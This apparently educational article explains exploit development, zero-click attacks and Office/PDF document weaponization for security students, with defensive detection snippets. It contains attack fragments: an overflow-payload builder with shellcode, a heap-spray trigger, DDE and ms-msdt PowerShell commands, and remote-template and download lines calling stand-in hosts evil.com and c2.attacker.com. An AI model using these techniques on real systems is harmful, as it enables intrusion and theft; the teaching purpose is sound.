A deep walk into zero-click exploits, document weaponization, and the invisible attacks that compromise systems without a single interaction. Built for students and the security-curious.
An exploit is a piece of code, data, or sequence of commands that takes advantage of a vulnerability (a bug or design flaw) in software to cause unintended behaviour: crashing systems, escalating privileges, or executing arbitrary code on a target machine. Exploits are the primary tool used by attackers, penetration testers, and nation-state cyber units to gain unauthorized access to systems.
Exploits range from simple buffer overflows (where too much data is written into a fixed-size memory region, overwriting control structures) to sophisticated, multi-stage attack chains that can compromise a device with zero user interaction. Some exploits require the victim to click a link or open a file (one-click). Others fire automatically when a message, image, or network packet is received by a vulnerable application (zero-click). Understanding how they work — step by step — is the first line of defense for any cybersecurity professional.
One-click exploits require a single user action: clicking a link, opening a file, or viewing an image. The exploit triggers the moment the software processes the malicious input. Example: opening a weaponized PDF in a vulnerable version of Adobe Reader triggers a JavaScript-based heap spray exploit, giving the attacker code execution in the Reader process. The user sees a normal document; behind the scenes, shellcode has already downloaded a remote access trojan.
Zero-click exploits need no interaction. A received message, notification, or network packet is enough to compromise the device. The exploit targets automatic parsing code (image decoders, font renderers, media codecs) that runs before the user even sees the content. Example: NSO Group's FORCEDENTRY exploit sent a crafted PDF via iMessage. The iOS CoreGraphics parser decompressed a JBIG2 image stream, triggering a memory corruption bug that gave the attacker code execution, which was then used to silently install Pegasus spyware on the victim's phone.
Document exploits are weaponized Office docs (.docx, .xlsx), PDFs, or RTF files that execute code when parsed by the application. These work because document formats are complex: PDFs support embedded JavaScript, Word supports VBA macros and OLE objects, RTF supports binary object embedding. An attacker crafts a file that looks like a normal invoice or report but contains hidden payloads in its internal structure. When the application's parser processes this structure, it hits a vulnerability, and the attacker's code runs.
Exploit chains stack multiple vulnerabilities together to achieve full compromise, from initial access to persistence. A single exploit might only get code execution inside a sandboxed process. To escape the sandbox, escalate to admin/root, and persist across reboots, the attacker chains 2–5 additional exploits. Example: a document exploit (initial access) → sandbox escape (break out of Protected View) → kernel privilege escalation (get SYSTEM/root) → persistence mechanism (survive reboot). Each link in the chain can cost on the order of $100K–$500K on the exploit market.
Every exploit is a math problem. Before any code is written, the attacker must calculate: how many bytes to write, what address to overwrite, how to convert a URL into hex, how to align shellcode in memory, and how to translate between decimal, hexadecimal, and binary. This section breaks down every calculation step-by-step so you see exactly how the numbers work.
Computers work in binary (base-2), humans work in decimal (base-10), but hackers work in hexadecimal (base-16). Why? Because one hex digit maps perfectly to 4 binary bits, and two hex digits map to exactly one byte (8 bits). This makes it trivial to read and write raw memory contents.
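The mapping between the three bases can be checked directly. The snippet below is a minimal sketch using only Python built-ins; the value 222 is an arbitrary example, not something taken from the walkthrough.

```python
# Convert one value between decimal, hexadecimal, and binary.
value = 222                      # decimal

as_hex = format(value, "02x")    # two hex digits = one byte
as_bin = format(value, "08b")    # eight bits = one byte

print(value, as_hex, as_bin)

# Each hex digit corresponds to exactly four bits (a nibble).
for digit in as_hex:
    print(digit, "->", format(int(digit, 16), "04b"))

# Round-trip: parsing the hex or binary text gives back the same number.
assert int(as_hex, 16) == value
assert int(as_bin, 2) == value
```

Reading the output digit by digit shows why hex is convenient for memory dumps: each byte is always exactly two characters wide.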
A buffer overflow isn't random — it's precisely calculated. The attacker must determine the exact number of bytes between the start of the buffer and the saved EIP (return address) on the stack. This offset determines how much "junk" padding to write before placing the hijacked address.
// Illustrative vulnerable function of the kind found in a PDF reader or document parser.
// The programmer allocated a fixed-size buffer but used an UNSAFE copy function.
#include <string.h>

void parse_document_title(char *incoming_doc_data) {
    char title_buffer[50];   // The application allocates exactly 50 bytes for the title

    // VULNERABILITY: strcpy() does NOT check the length of incoming data!
    // If the attacker puts 200 bytes in the document's title field,
    // the copy runs past the end of title_buffer into adjacent memory,
    // overwriting the saved EBP and saved EIP on the stack.
    strcpy(title_buffer, incoming_doc_data);   // <- THE BUG
}

// WHY THIS IS DANGEROUS:
// title_buffer sits on the stack. After it (at higher addresses) are:
//   - Saved EBP (4 bytes): the previous function's base pointer
//   - Saved EIP (4 bytes): the RETURN ADDRESS (where the CPU goes next)
// With no padding, 50 + 4 + 4 = 58 bytes reach the end of saved EIP.
// Compilers often insert alignment padding after the buffer, so the real
// offset is measured in a debugger rather than read off the array size.

// SAFER ALTERNATIVE:
void parse_document_title_safe(const char *incoming_doc_data) {
    char title_buffer[50];

    // strncpy() copies at most 49 bytes here, but it does NOT add a
    // terminator when the input is truncated, so write one explicitly.
    strncpy(title_buffer, incoming_doc_data, sizeof(title_buffer) - 1);
    title_buffer[sizeof(title_buffer) - 1] = '\0';
}
# ═══════════════════════════════════════════════════
# THE TOOL PROVISIONING LOGIC
# How the overflow payload is laid out, byte by byte.
# ═══════════════════════════════════════════════════
from struct import pack

# ── Configuration (from fuzzing/debugging) ──
buffer_limit = 64                     # bytes of padding before the return address
target_eip = pack("<I", 0xDEADBEEF)   # placeholder address, little-endian: b"\xef\xbe\xad\xde"

# THE MATH:
# This walkthrough treats the saved EIP as starting 64 bytes after the
# start of the buffer: 64 bytes of padding + 4 bytes of address = 68 bytes.
# In a real stack frame, saved EBP and compiler padding sit between the
# buffer and the return address, so the offset is measured, not assumed.

# 1. Fill the buffer with 'A's (0x41 in hex)
padding = b"A" * buffer_limit
# Result: b"AAAAAAAAAA...AAAA" (64 bytes)
# In hex: 41 41 41 41 41 41 41 41 ... (64 times)

# 2. Append the target return address
# These 4 bytes land past the padding, where the saved EIP is assumed to be.
overflow = padding + target_eip
# Result: b"AAAA...AAAA\xef\xbe\xad\xde" (68 bytes)
# Memory: [41 41 41 41 ...×64... 41 41 41 41] [EF BE AD DE]
#          ← buffer (filled) →                 ← EIP (hijacked!) →

# 3. Add the shellcode (fragment only; the rest is elided in the source)
shellcode = b"\x90\x90\x90\x90"        # NOP sled (0x90 = "do nothing")
shellcode += b"\x31\xc0"               # xor eax, eax   (clear register)
shellcode += b"\x50"                   # push eax       (push NULL onto stack)
shellcode += b"\x68\x2f\x2f\x73\x68"   # push "//sh"    (4 bytes of a string)
# ... more instructions to download & execute payload ...

# 4. ASSEMBLE THE FINAL ATTACK STRING
final_attack_string = overflow + shellcode

print(f"Buffer size: {buffer_limit} bytes (junk padding)")
print(f"EIP target: {target_eip.hex()} → 0xDEADBEEF")
print(f"Shellcode: {len(shellcode)} bytes")
print(f"Total attack: {len(final_attack_string)} bytes")
print()
print("Layout in memory:")
print(f"[{'A'*8}...×{buffer_limit}...{'A'*8}] [EFBEADDE] [9090...shellcode]")
print(f" ←── {buffer_limit} bytes (junk) ──→ ← 4B EIP → ← {len(shellcode)}B code →")
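The shellcode needs to contain the URL of the second-stage payload, and in source code that string is usually written as a run of hex byte values, one per character, taken from the ASCII table. Note that this is only a change of notation: the bytes written as \x68\x74\x74\x70 are exactly the bytes of "http", so a scanner that inspects the raw bytes still sees the URL. Hex notation makes the string harder for a human to spot in source; it does not hide it from string-based scanners.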
# ═══════════════════════════════════════════════════
# Turning a URL into hex escapes, character by character.
# This changes the notation only: the resulting bytes are
# identical to the ASCII text of the URL.
# ═══════════════════════════════════════════════════
url = "https://putty.exe"   # placeholder string from the walkthrough, not a valid URL

# Convert each character to its \x## hex representation
hex_url = "".join("\\x%02x" % ord(c) for c in url)

print(f"Original URL: {url}")
print(f"Hex Encoded: {hex_url}")
print()

# Step-by-step: what ord() and %02x do for each character:
# 'h' → ord('h') = 104 → hex(104) = 0x68 → "\x68"
# 't' → ord('t') = 116 → hex(116) = 0x74 → "\x74"
# 't' → ord('t') = 116 → hex(116) = 0x74 → "\x74"
# 'p' → ord('p') = 112 → hex(112) = 0x70 → "\x70"
# 's' → ord('s') = 115 → hex(115) = 0x73 → "\x73"
# ':' → ord(':') = 58  → hex(58)  = 0x3a → "\x3a"
# '/' → ord('/') = 47  → hex(47)  = 0x2f → "\x2f"
# '/' → ord('/') = 47  → hex(47)  = 0x2f → "\x2f"
# ... and so on for every character

# RESULT for "https://putty.exe":
# \x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x75\x74\x74\x79\x2e\x65\x78\x65

# A shellcode fragment: machine code with 4 bytes of the string inline
shellcode = b"\x31\xc0"           # xor eax, eax  (clear EAX register)
shellcode += b"\x50"              # push eax      (push NULL terminator)
shellcode += b"\x68"              # push imm32    (opcode; the next 4 bytes are the operand)
shellcode += url[-4:].encode()    # ".exe" as raw bytes (only the last 4 characters)
shellcode += b"\x89\xe3"          # mov ebx, esp  (EBX now points to ".exe" on the stack)
shellcode += b"\x50"              # push eax      (more stack setup...)
shellcode += b"\x53"              # push ebx      (push string pointer as arg)

print(f"Shellcode bytes: {shellcode.hex()}")
print(f"Shellcode size: {len(shellcode)} bytes")
print()
print("Raw bytes as hex: 31c050682e65786589e35053")
print("Disassembled:     xor eax,eax; push eax; push '.exe'; mov ebx,esp; push eax; push ebx")
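From the defender's side, it is worth confirming that hex escapes are only a way of writing bytes. The sketch below compares an escaped literal with its plain form, then runs a small printable-string scan similar in spirit to the Unix strings utility. The helper name printable_strings and the example.invalid host are assumptions made for illustration.

```python
import re

# The same eight bytes, written two ways.
escaped = b"\x68\x74\x74\x70\x73\x3a\x2f\x2f"
plain = b"https://"
print(escaped == plain)  # the two literals are byte-for-byte identical


def printable_strings(blob, min_len=4):
    """Return runs of printable ASCII at least min_len bytes long (hypothetical helper)."""
    pattern = rb"[ -~]{%d,}" % min_len
    return re.findall(pattern, blob)


# A stand-in blob: non-printable bytes around a hex-escaped URL.
blob = b"\x00\x01" + escaped + b"example.invalid/a" + b"\x00\xff"
found = printable_strings(blob)
print(found)
```

Because the scan works on the bytes themselves, it finds the URL no matter how the literal was typed in the source file.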
Heap spraying is pure arithmetic. The attacker must calculate exactly how large each spray block is, how many copies are needed, and verify that the target address (0x0C0C0C0C) falls inside the sprayed region.
A PDF file is a structured database of numbered objects. Each object has a generation number (usually 0) and an offset (the byte position from the start of the file where that object begins). The cross-reference table (xref) maps object numbers to byte offsets so the PDF reader can jump directly to any object.
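To make the offset idea concrete, the sketch below locates each "N G obj" header in a tiny hand-written PDF fragment and prints the entry an xref table would hold for it (a 10-digit byte offset, a 5-digit generation number, and n for "in use"). The two-object sample is an assumption for illustration and is not a complete, viewable PDF.

```python
import re

# A deliberately tiny stand-in for a PDF body (not a complete document).
pdf = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
)

# Map object number -> (byte offset from start of file, generation number).
offsets = {}
for match in re.finditer(rb"(?m)^(\d+) (\d+) obj\b", pdf):
    obj_num = int(match.group(1))
    generation = int(match.group(2))
    offsets[obj_num] = (match.start(), generation)

# Print entries in the fixed-width form used by the cross-reference table.
for obj_num, (offset, generation) in sorted(offsets.items()):
    print(f"{offset:010d} {generation:05d} n   <- object {obj_num}")
```

Forensic tools use the same comparison in reverse: if the offsets recorded in a file's xref table do not point at the matching object headers, the file has been edited or appended to after it was generated.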
Every number in an exploit is calculated, not guessed. The buffer size comes from reverse-engineering the target binary. The EIP offset comes from cyclic pattern fuzzing. The heap spray address comes from memory layout analysis. The xref offsets come from counting bytes in the PDF file. If any single number is wrong by even 1 byte, the exploit crashes the target instead of compromising it. This is why exploit development is considered one of the most difficult skills in cybersecurity — it's applied mathematics at the machine code level.
Computers store everything as numbers, but hackers, CPUs, and network protocols each prefer different formats: the same value can be written in decimal, hexadecimal, or binary.
In a buffer overflow, the attacker must write exactly the right number of bytes to reach the return address (EIP). Too few and the return address is untouched; too many or misaligned and the process simply crashes. The offset is the distance in bytes from the start of the buffer to the saved return address.
CPUs store multi-byte values in different orders. x86 uses little-endian (least significant byte first), while networks use big-endian. When building exploits, you must write addresses in the correct byte order or the CPU reads them wrong.
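Byte order is easy to see with Python's struct module. This minimal sketch packs the same 32-bit value both ways; 0xDEADBEEF is the placeholder value used elsewhere in this walkthrough.

```python
import struct

value = 0xDEADBEEF

little = struct.pack("<I", value)   # x86 order: least significant byte first
big = struct.pack(">I", value)      # network order: most significant byte first

print("little-endian:", little.hex(" "))
print("big-endian:   ", big.hex(" "))

# Reading the bytes back with the wrong order yields a different number.
misread = struct.unpack(">I", little)[0]
print(hex(misread))
```

The same four bytes are read as 0xDEADBEEF by a little-endian CPU and as 0xEFBEADDE when interpreted big-endian, which is why a wrong byte order produces a bad pointer.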
Heap spraying floods the process memory with repeated copies of your payload. When the exploited code jumps to a "random" address, the huge NOP sled catches the CPU and slides it into shellcode. More spray = higher chance of landing.
Modern attacks rarely use a single exploit. A document exploit is just the initial access — the first step in a multi-stage operation. Below is a realistic attack chain (based on real APT campaigns) showing how a single weaponized document leads to complete network compromise. Each step represents a different tool or technique, and each step is a potential detection point where defenders can break the chain.
Zero-click exploits are the pinnacle of offensive security research. The victim does nothing — no link clicked, no file opened, no permission granted. The exploit fires automatically when data is received and processed by a vulnerable parser. The attacker sends a specially crafted message, image, or data packet to the target device. The device's software automatically processes this incoming data, triggering the vulnerability before the user ever sees a notification.
Most zero-click exploits target message parsing code — the part of an application that automatically processes incoming data before the user even sees it. Here is the exact sequence of events in a typical zero-click attack:
// Zero-Click Attack Flow: Step by Step

STEP 1: ATTACKER SENDS CRAFTED DATA
→ Attacker sends a message/image/file to the target
→ The data contains a carefully crafted malformed structure
→ Example: a PNG image with an oversized IDAT chunk header
→ The target device receives this over the network

STEP 2: AUTOMATIC PARSING BEGINS
→ The app's background process picks up the incoming data
→ It calls the relevant parser (image decoder, PDF renderer, etc.)
→ This happens BEFORE the user sees any notification
→ The parser starts reading the crafted data byte-by-byte

STEP 3: VULNERABILITY TRIGGERS
→ The malformed data causes an unexpected condition:
   • Integer overflow → allocates too-small buffer
   • Heap overflow → writes past allocated memory
   • Type confusion → treats data as wrong object type
   • Use-after-free → accesses memory already freed
→ The attacker now controls part of the process memory

STEP 4: CODE EXECUTION
→ Controlled memory corruption redirects code execution
→ Attacker's shellcode runs in the context of the app
→ Downloads and installs spyware (e.g., Pegasus, Predator)
→ Achieves persistence across reboots

STEP 5: THE USER SEES NOTHING
→ The crafted message may be deleted automatically
→ No crash, no notification, no trace
→ The device is fully compromised
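The first bug class in Step 3, an integer overflow that leads to a too-small allocation, can be reproduced with plain arithmetic. The sketch below models a 32-bit size calculation for an image buffer and the bounds check that prevents it. The function names and the image dimensions are hypothetical and chosen only to make the wrap-around visible.

```python
MASK32 = 0xFFFFFFFF  # largest value a 32-bit unsigned integer can hold


def alloc_size_32bit(width, height, bytes_per_pixel=4):
    """Size as a 32-bit unsigned multiply would compute it (wraps on overflow)."""
    return (width * height * bytes_per_pixel) & MASK32


def checked_alloc_size(width, height, bytes_per_pixel=4, limit=MASK32):
    """Reject dimensions whose true size does not fit in the size field."""
    size = width * height * bytes_per_pixel
    if size > limit:
        raise ValueError("image dimensions overflow the size field")
    return size


width, height = 0x10000, 0x10001          # attacker-chosen header values
true_size = width * height * 4            # what the decoder will actually write
wrapped = alloc_size_32bit(width, height) # what the allocator is asked for

print(f"bytes needed:    {true_size:,}")
print(f"bytes allocated: {wrapped:,}")

try:
    checked_alloc_size(width, height)
except ValueError as err:
    print("rejected:", err)
```

The decoder believes it needs about 17 GB but asks the allocator for only 256 KiB, so every write past that point corrupts adjacent heap memory. Validating the product before allocating closes the gap.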
The common zero-click attack surfaces are:
What happened: A buffer overflow in WhatsApp's VoIP stack (CVE-2019-3568, disclosed May 2019). Simply calling the target installed Pegasus spyware. The call didn't even need to be answered: the VoIP processing code parsed the attacker's crafted packets as soon as the incoming call was initiated.
How it worked: The attacker sent a specially crafted series of SRTCP (Secure Real-time Transport Control Protocol) packets during the call setup phase. These packets triggered a buffer overflow in the VoIP stack's packet handling, corrupting memory and redirecting execution. The shellcode then downloaded and installed the Pegasus implant, achieving full access to messages, calls, camera, microphone, and GPS.
Impact: Used by governments to spy on journalists, activists, and political dissidents in over 40 countries. Affected WhatsApp on iOS and Android in versions released before the May 2019 fix.
What happened: Samsung added a custom image format called Qmage (.qmg) to their Android fork. The Qmage codec was integrated into the Skia graphics library, meaning every Samsung phone used it to decode images — including images received via MMS.
How it worked: The researcher (Mateusz Jurczyk of Project Zero) found that the Qmage decoder had multiple memory corruption bugs — heap overflows that occurred when parsing malformed Qmage files. Because Android's MMS handler automatically decoded image attachments, sending a single crafted Qmage file via MMS triggered the bug with zero user interaction. The researcher demonstrated complete remote code execution by sending a sequence of MMS messages.
Impact: Affected hundreds of millions of Samsung Galaxy devices. Required no user interaction — just knowing the target's phone number was sufficient.
What happened: NSO Group's most sophisticated exploit. It targeted Apple's CoreGraphics PDF parser via iMessage. This was not a simple buffer overflow — the attackers built a virtual computer inside the JBIG2 image decompression engine, achieving Turing-complete computation within the decompressor itself.
How it worked: The exploit sent a PDF disguised as a .gif file via iMessage. When iOS rendered the message preview, CoreGraphics parsed the PDF, which contained a JBIG2 image stream. JBIG2 is a compression format that supports logical operations (AND, OR, XOR) on bitmap regions. The attackers chained over 70,000 JBIG2 segment commands to build a virtual CPU architecture — complete with registers, a memory subsystem, and an instruction set — entirely within the decompressor. This virtual machine then computed the addresses needed for the exploit, bypassed ASLR (Address Space Layout Randomization), and achieved arbitrary code execution.
Impact: Bypassed Apple's BlastDoor sandbox (designed specifically to protect iMessage). Used to deploy Pegasus on iPhones of journalists, heads of state, and human rights activists. Google Project Zero assessed it to be "one of the most technically sophisticated exploits we've ever seen."
What happened: Another iMessage zero-click exploit chain discovered by Citizen Lab. This one used malicious PassKit (.pkpass) attachments — the same format used for Apple Wallet passes (boarding passes, tickets, etc.).
How it worked: The exploit chain combined two vulnerabilities: CVE-2023-41064 (a buffer overflow in ImageIO when processing WebP images) and CVE-2023-41061 (a validation issue in Wallet). The attacker sent a PassKit attachment via iMessage containing a crafted WebP image. ImageIO's WebP decoder hit the buffer overflow, and the second bug allowed sandbox escape. Together, they achieved full device compromise.
Impact: Used by NSO Group to deploy Pegasus. Apple issued emergency patches (iOS 16.6.1). This exploit demonstrated that even after years of hardening iMessage (BlastDoor sandbox, pointer authentication, etc.), zero-click attacks remained possible.
Document exploits turn familiar file formats — Word (.docx), Excel (.xlsx), PDF (.pdf), RTF (.rtf), and PowerPoint (.pptx) — into weapons. Because users trust documents (they receive invoices, resumes, contracts, and reports daily), weaponized documents remain one of the most effective initial access vectors in real-world attacks. The attacker crafts a file that looks completely normal when opened — it displays the expected content (an invoice, a report, a chart). But hidden inside the file's internal structure are malicious payloads that execute code the moment the application parses them.
Document formats are inherently complex. The PDF specification alone is over 1,000 pages. Microsoft's Office Open XML format contains dozens of XML namespaces with hundreds of features. This complexity means there are thousands of code paths in the parser — and each code path is a potential vulnerability. Below are the eight primary techniques attackers use to weaponize documents.
What it is: Visual Basic for Applications (VBA) is a full programming language embedded inside Microsoft Office. Macros are VBA programs stored inside .docm, .xlsm, or .pptm files. When a user clicks "Enable Content," the macro runs with the same privileges as the Office application.
How attackers use it: The attacker writes a VBA macro that uses the Shell() function or WScript.Shell to execute system commands, typically downloading a second-stage payload from a remote server using PowerShell (powershell -e [base64 encoded command]). The macro auto-executes on open via event handlers such as AutoOpen() or Document_Open() in Word and Auto_Open() or Workbook_Open() in Excel.
Example generation: A macro containing Sub Auto_Open() / Shell "powershell -e JABjAD0..." / End Sub executes the moment the user clicks "Enable Content." The base64 string decodes to a PowerShell cradle that downloads a Cobalt Strike beacon from the attacker's server.
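When triaging a macro like this, the first step is usually to decode the argument passed to powershell -e. PowerShell expects that argument to be Base64 over UTF-16LE text, so it can be reversed with the standard library. The sketch below decodes only the visible prefix from the example above, padded to a valid Base64 length; the function name is hypothetical.

```python
import base64


def decode_powershell_encoded(b64_text):
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE)."""
    return base64.b64decode(b64_text).decode("utf-16-le")


# "JABjAD0" is the visible prefix of the example; "A" completes the final group.
prefix = decode_powershell_encoded("JABjAD0A")
print(prefix)  # prints: $c=
```

The decoded prefix is the start of a variable assignment, which is why so many encoded PowerShell commands begin with the characters JAB.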
What it is: Object Linking and Embedding (OLE) allows embedding foreign objects inside a document — Excel sheets inside Word, PDF files inside PowerPoint, or even executable programs disguised with document icons. The embedded object is stored as a binary blob inside the document file.
How attackers use it: The attacker embeds a malicious OLE object — often targeting the archaic Microsoft Equation Editor (EQNEDT32.EXE), which has a known buffer overflow (CVE-2017-11882). When the document renders the embedded equation, EQNEDT32.EXE parses the OLE data, hits the overflow, and the attacker's shellcode executes. No "Enable Content" prompt appears because this is not a macro attack — it exploits the rendering engine itself.
Example generation: The OLE object contains a crafted equation binary where the font name field exceeds 48 bytes, overflowing EQNEDT32.EXE's stack buffer and overwriting the return address with a pointer to the embedded shellcode.
What it is: Word and Excel documents can reference external template files via a URL. In Word, the template URL is stored in a relationship file (word/_rels/settings.xml.rels inside the .docx ZIP archive). When the document opens, Office fetches the remote template automatically.
How attackers use it: The initial document contains no malicious code of its own, so it typically passes static antivirus scans. But when opened, it fetches a remote .dotm template from the attacker's server. That template contains the actual malicious macro or exploit. This two-stage approach evades email security scanners because the malicious payload never touches the email gateway.
Example generation: The attacker modifies settings.xml.rels so that the attachedTemplate relationship has Target="http://evil.com/template.dotm" with TargetMode="External". The .docx file itself contains only the URL. The payload only exists on the remote server.
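Because the only trace in the file is an external relationship, a simple defensive check is to list every relationship marked TargetMode="External". The sketch below does that with the standard library, run against a small stand-in archive built in memory. The function name, the sample part name, and the example.invalid URL are assumptions for illustration; ordinary hyperlinks are also external relationships, so hits need review rather than automatic blocking.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"


def external_relationships(docx_bytes):
    """Return (part, type, target) for each relationship with TargetMode="External"."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for part in archive.namelist():
            if not part.endswith(".rels"):
                continue
            # Caveat: for untrusted files, prefer a hardened XML parser.
            root = ET.fromstring(archive.read(part))
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode") == "External":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((part, rel_type, rel.get("Target")))
    return found


# Stand-in archive containing a single relationship part (not a full .docx).
RELS_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" '
    'Target="http://example.invalid/template.dotm" TargetMode="External"/>'
    "</Relationships>"
)
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("word/_rels/settings.xml.rels", RELS_XML)

hits = external_relationships(buffer.getvalue())
for hit in hits:
    print(hit)
```

An attachedTemplate or oleObject relationship pointing at an internet host is a much stronger signal than a hyperlink, so the relationship type is reported alongside the target.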
What it is: Dynamic Data Exchange (DDE) is a legacy Windows inter-process communication protocol. Word and Excel support DDE field codes that can pull data from other applications. The field code { DDEAUTO "cmd" "/c calc.exe" } tells Word to execute the command via DDE.
How attackers use it: The attacker inserts a DDE field code into a .docx file. When the user opens the document, Word prompts "This document contains links to other data sources. Do you want to update?" If the user clicks "Yes" (which most users do reflexively), the DDE command executes — typically launching PowerShell to download malware. This works even with macros completely disabled.
Example generation: Insert field code: { DDEAUTO c:\\windows\\system32\\cmd "/k powershell -e [payload]" }. The field appears as "!Unexpected End of Formula" in the document text, which the attacker hides by formatting the font as white, 1pt size.
What it is: EQNEDT32.EXE is Microsoft's Equation Editor — a 17-year-old component compiled without any stack protections (no ASLR, no DEP, no stack canaries). It processes OLE objects embedded in Office documents when they contain mathematical equations.
How attackers use it: A specially crafted OLE equation object contains a font name that exceeds the 48-byte buffer in EQNEDT32.EXE. The overflow overwrites the saved return address on the stack. When the function returns, it jumps to the attacker's shellcode instead of the legitimate caller. Because EQNEDT32.EXE has no ASLR, the attacker knows exactly where the buffer is in memory.
Example generation: The OLE object's font record: [48 bytes of font name] [4 bytes: return address → shellcode] [shellcode bytes]. The return address is hardcoded to 0x00402114 (a known "call eax" gadget in EQNEDT32.EXE). Still actively exploited today.
What it is: A vulnerability in Microsoft's Support Diagnostic Tool (MSDT). Documents can invoke MSDT via the ms-msdt: protocol URI handler. The diagnostic tool accepts command-line arguments that include PowerShell code, which it executes with the user's privileges.
How attackers use it: The attacker creates a .docx file with an external OLE reference pointing to an attacker-controlled HTML page. When Word fetches this page, the HTML contains JavaScript that redirects to a ms-msdt: URI with embedded PowerShell commands. MSDT launches and executes the commands. No macros, no "Enable Content" prompt — not even Protected View stops it in some configurations.
Example generation: The ms-msdt URI: ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? /../../$(powershell -e [base64])/..". The PowerShell payload encoded in base64 downloads and executes a reverse shell.
What it is: Mark-of-the-Web (MotW) is a Windows security feature that tags files downloaded from the internet with a Zone.Identifier NTFS alternate data stream. Office blocks macros from MotW-tagged files. But ISO/IMG disk image files and ZIP archives can strip MotW from files inside them.
How attackers use it: The attacker packages a malicious .docm or .lnk file inside an ISO disk image. When the victim opens the ISO, Windows mounts it as a virtual drive. Files extracted from the mounted drive do not inherit the MotW tag, so macro-blocking and SmartScreen warnings are bypassed. This became the dominant delivery technique in 2022-2023 after Microsoft blocked internet-sourced macros by default.
Example generation: Attacker creates Invoice.iso containing Invoice.docm + a shortcut (.lnk) that auto-runs PowerShell. The ISO bypasses MotW → the .lnk runs without SmartScreen interception.
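The Zone.Identifier stream itself is a small INI-style text file, so its contents are easy to inspect. The sketch below parses a sample stream with configparser; the sample text and the helper name are assumptions for illustration. On Windows with NTFS, the real stream can be read by opening the path with ":Zone.Identifier" appended.

```python
import configparser


def zone_id(stream_text):
    """Return the ZoneId from Zone.Identifier text, or None if it is absent."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(stream_text)
    return parser.getint("ZoneTransfer", "ZoneId", fallback=None)


# Sample contents of a Zone.Identifier stream (hypothetical URLs).
sample = (
    "[ZoneTransfer]\n"
    "ZoneId=3\n"
    "ReferrerUrl=https://example.invalid/\n"
    "HostUrl=https://example.invalid/Invoice.iso\n"
)

zone = zone_id(sample)
print("ZoneId:", zone)
print("Marked as downloaded from the Internet zone:", zone == 3)
```

ZoneId 3 is the Internet zone. A file extracted from a container with no such stream at all yields None, which is exactly the condition the delivery technique above relies on.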
What it is: Microsoft OneNote allows embedding arbitrary file attachments inside .one notebook files. Unlike Word/Excel, OneNote did not block macros or restrict executable content — it simply showed a generic "double-click to open attachment" prompt.
How attackers use it: After Microsoft blocked VBA macros from internet documents (2022), threat actors switched to OneNote as their primary delivery format. The attacker embeds a .bat, .vbs, .hta, or .wsf script inside a .one file, layered behind a graphic that says "Double-click to view document." When clicked, the embedded script executes. Qakbot, AsyncRAT, and IcedID campaigns all adopted this technique in Q1 2023.
Example generation: The .one file contains an embedded payload.bat that runs powershell -e [base64], hidden behind a "Click here to view" image overlay that covers the entire page.
Every document exploit follows a similar pattern: delivery → trigger → execution → post-exploitation. Here is a detailed breakdown showing exactly what happens at each stage, including what code or data is involved and what the system sees:
// Complete anatomy of a document exploit chain
// This shows what happens at each stage

STAGE 1: DELIVERY
→ Attacker crafts a phishing email:
     From: accounting@acme-corp.net (spoofed domain)
     Subject: "Invoice #2024-0342 - Payment Overdue"
     Attachment: Invoice_March_2024.pdf (6.8 KB)
→ The PDF looks like a legitimate invoice when opened
→ The recipient is in Accounts Payable, so they open invoices daily
→ The file passes the email gateway's antivirus scan
   (because the payload is compressed/obfuscated inside a stream)

STAGE 2: TRIGGER (what happens when the file opens)
→ The user double-clicks the PDF attachment
→ Adobe Reader (or the system PDF viewer) launches
→ The reader parses the PDF's object structure:
     Object 1: Catalog → finds /OpenAction → follows reference
     Object 7: Action → type is /JavaScript → loads JS engine
     Object 9: Stream → FlateDecode decompresses 4,821 bytes
→ The decompressed JavaScript begins executing immediately
→ The user sees the invoice on screen; nothing looks wrong

STAGE 3: EXPLOITATION (the JavaScript payload executes)
→ The JavaScript performs three operations:
   1. DECODE: Converts hex-encoded shellcode to binary
        var sc = unescape("%ue8fc%u8200%u0000%u6089...");
   2. HEAP SPRAY: Fills 200MB of memory with shellcode copies
        for(i=0; i<200; i++) spray[i] = nopsled + shellcode;
   3. TRIGGER: Calls a vulnerable Reader API function
        Collab.collectEmailInfo({subj: "A".repeat(0x4141)});
→ The API function has a buffer overflow vulnerability
→ The oversized string overflows the buffer, overwrites EIP
→ EIP now points to 0x0C0C0C0C (inside the sprayed heap)
→ CPU jumps to the NOP sled → slides into shellcode
→ The attacker now has code execution in the Reader process

STAGE 4: POST-EXPLOITATION (full compromise)
→ Shellcode downloads second-stage payload:
     URLDownloadToFileA("http://c2.attacker.com/beacon.exe")
→ Beacon.exe is a Cobalt Strike implant that:
   • Establishes encrypted C2 channel to attacker's server
   • Uses kernel exploit for SYSTEM privilege escalation
   • Dumps credentials with Mimikatz
   • Moves laterally across the network via SMB/WMI
   • Discovers domain controller, becomes Domain Admin
→ Data exfiltration begins, or ransomware deploys
→ The entire chain: email → PDF → JavaScript → shellcode → beacon
   took less than 3 seconds from the moment the file was opened
Follina was a game-changer because it achieved remote code execution without macros, without "Enable Content" prompts, and even from the Windows Explorer preview pane. Here is exactly how the exploit works, step by step, with every component explained:
